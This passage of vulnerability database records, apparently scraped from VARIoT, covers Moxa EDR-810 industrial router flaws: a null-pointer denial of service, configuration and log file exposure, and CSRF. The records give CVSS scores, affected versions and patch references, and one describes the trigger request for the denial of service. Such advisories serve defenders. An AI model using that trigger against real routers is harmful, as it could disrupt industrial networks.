"data": "An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to \"/MOXA\\_CFG2.ini\" without a cookie header to trigger this vulnerability. Moxa EDR-810 Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14436"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013421"
},
{
"db": "CNVD",
"id": "CNVD-2018-11731"
},
{
"db": "VULHUB",
"id": "VHN-105158"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14436",
"trust": 3.1
},
{
"db": "TALOS",
"id": "TALOS-2017-0474",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013421",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-809",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11731",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105158",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11731"
},
{
"db": "VULHUB",
"id": "VHN-105158"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013421"
},
{
"db": "NVD",
"id": "CVE-2017-14436"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-809"
}
]
},
"id": "VAR-201805-0141",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11731"
},
{
"db": "VULHUB",
"id": "VHN-105158"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11731"
}
]
},
"last_update_date": "2023-12-18T13:08:30.403000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for MoxaEDR-810 Denial of Service Vulnerability (CNVD-2018-11731)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132243"
},
{
"title": "Moxa EDR-810 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190040"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11731"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013421"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-809"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105158"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013421"
},
{
"db": "NVD",
"id": "CVE-2017-14436"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0474"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14436"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14436"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0474"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11731"
},
{
"db": "VULHUB",
"id": "VHN-105158"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013421"
},
{
"db": "NVD",
"id": "CVE-2017-14436"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-809"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11731"
},
{
"db": "VULHUB",
"id": "VHN-105158"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013421"
},
{
"db": "NVD",
"id": "CVE-2017-14436"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-809"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11731"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-105158"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013421"
},
{
"date": "2018-05-14T20:29:00.890000",
"db": "NVD",
"id": "CVE-2017-14436"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-809"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11731"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-105158"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013421"
},
{
"date": "2022-12-09T02:05:24.507000",
"db": "NVD",
"id": "CVE-2017-14436"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-809"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-809"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 In NULL Pointer dereference vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013421"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-809"
}
],
"trust": 0.6
}
}
VAR-201702-0295
Vulnerability from variot - Updated: 2023-12-18 12:57An issue was discovered in Moxa EDR-810 Industrial Secure Router. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access configuration and log files (PRIVILEGE ESCALATION). The MoxaEDR-810 router has a remote privilege escalation vulnerability that can be exploited by an attacker to gain unauthorized access. Versions prior to Moxa EDR-810 3.13 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201702-0295",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "3.12"
},
{
"model": "edr-810",
"scope": null,
"trust": 0.8,
"vendor": "moxa",
"version": null
},
{
"model": "edr-810 series",
"scope": "lt",
"trust": 0.8,
"vendor": "moxa",
"version": "3.13"
},
{
"model": "edr-810 router",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "3.13"
},
{
"model": "edr-810",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "3.12"
},
{
"model": "edr-810",
"scope": "eq",
"trust": 0.3,
"vendor": "moxa",
"version": "0"
},
{
"model": "edr-810",
"scope": "ne",
"trust": 0.3,
"vendor": "moxa",
"version": "3.13"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10276"
},
{
"db": "BID",
"id": "93800"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007682"
},
{
"db": "NVD",
"id": "CVE-2016-8346"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-668"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810-vpn:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-8346"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Maxim Rupp",
"sources": [
{
"db": "BID",
"id": "93800"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-668"
}
],
"trust": 0.9
},
"cve": "CVE-2016-8346",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-8346",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2016-10276",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-97166",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-8346",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-8346",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2016-10276",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201610-668",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-97166",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10276"
},
{
"db": "VULHUB",
"id": "VHN-97166"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007682"
},
{
"db": "NVD",
"id": "CVE-2016-8346"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-668"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in Moxa EDR-810 Industrial Secure Router. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access configuration and log files (PRIVILEGE ESCALATION). The MoxaEDR-810 router has a remote privilege escalation vulnerability that can be exploited by an attacker to gain unauthorized access. \nVersions prior to Moxa EDR-810 3.13 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-8346"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007682"
},
{
"db": "CNVD",
"id": "CNVD-2016-10276"
},
{
"db": "BID",
"id": "93800"
},
{
"db": "VULHUB",
"id": "VHN-97166"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-8346",
"trust": 3.4
},
{
"db": "ICS CERT",
"id": "ICSA-16-294-01",
"trust": 2.8
},
{
"db": "BID",
"id": "93800",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007682",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201610-668",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2016-10276",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-97166",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10276"
},
{
"db": "VULHUB",
"id": "VHN-97166"
},
{
"db": "BID",
"id": "93800"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007682"
},
{
"db": "NVD",
"id": "CVE-2016-8346"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-668"
}
]
},
"id": "VAR-201702-0295",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10276"
},
{
"db": "VULHUB",
"id": "VHN-97166"
}
],
"trust": 1.5293650749999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10276"
}
]
},
"last_update_date": "2023-12-18T12:57:29.988000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810\u30b7\u30ea\u30fc\u30ba",
"trust": 0.8,
"url": "http://japan.moxa.com/product/edr-810.htm"
},
{
"title": "MoxaEDR-810 Router Privilege Escalation Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/83162"
},
{
"title": "Moxa EDR-810 Router Remedial measures for remote privilege escalation",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=64979"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10276"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007682"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-668"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-532",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-97166"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007682"
},
{
"db": "NVD",
"id": "CVE-2016-8346"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-16-294-01"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/93800"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8346"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8346"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/93800/info"
},
{
"trust": 0.3,
"url": "http://www.moxa.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-10276"
},
{
"db": "VULHUB",
"id": "VHN-97166"
},
{
"db": "BID",
"id": "93800"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007682"
},
{
"db": "NVD",
"id": "CVE-2016-8346"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-668"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-10276"
},
{
"db": "VULHUB",
"id": "VHN-97166"
},
{
"db": "BID",
"id": "93800"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-007682"
},
{
"db": "NVD",
"id": "CVE-2016-8346"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-668"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-10276"
},
{
"date": "2017-02-13T00:00:00",
"db": "VULHUB",
"id": "VHN-97166"
},
{
"date": "2016-10-20T00:00:00",
"db": "BID",
"id": "93800"
},
{
"date": "2017-03-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-007682"
},
{
"date": "2017-02-13T21:59:00.643000",
"db": "NVD",
"id": "CVE-2016-8346"
},
{
"date": "2016-10-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201610-668"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-10276"
},
{
"date": "2017-02-23T00:00:00",
"db": "VULHUB",
"id": "VHN-97166"
},
{
"date": "2016-10-26T01:16:00",
"db": "BID",
"id": "93800"
},
{
"date": "2017-03-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-007682"
},
{
"date": "2017-02-23T19:27:03.990000",
"db": "NVD",
"id": "CVE-2016-8346"
},
{
"date": "2016-10-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201610-668"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201610-668"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 Vulnerability with elevated privileges in industrial secure routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-007682"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201610-668"
}
],
"trust": 0.6
}
}
VAR-201805-0125
Vulnerability from variot - Updated: 2023-12-18 12:50An exploitable cross-site request forgery vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP packet can cause cross-site request forgery. An attacker can create malicious HTML to trigger this vulnerability. Moxa EDR-810 Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0125",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11727"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013429"
},
{
"db": "NVD",
"id": "CVE-2017-12126"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1627"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12126"
}
]
},
"cve": "CVE-2017-12126",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
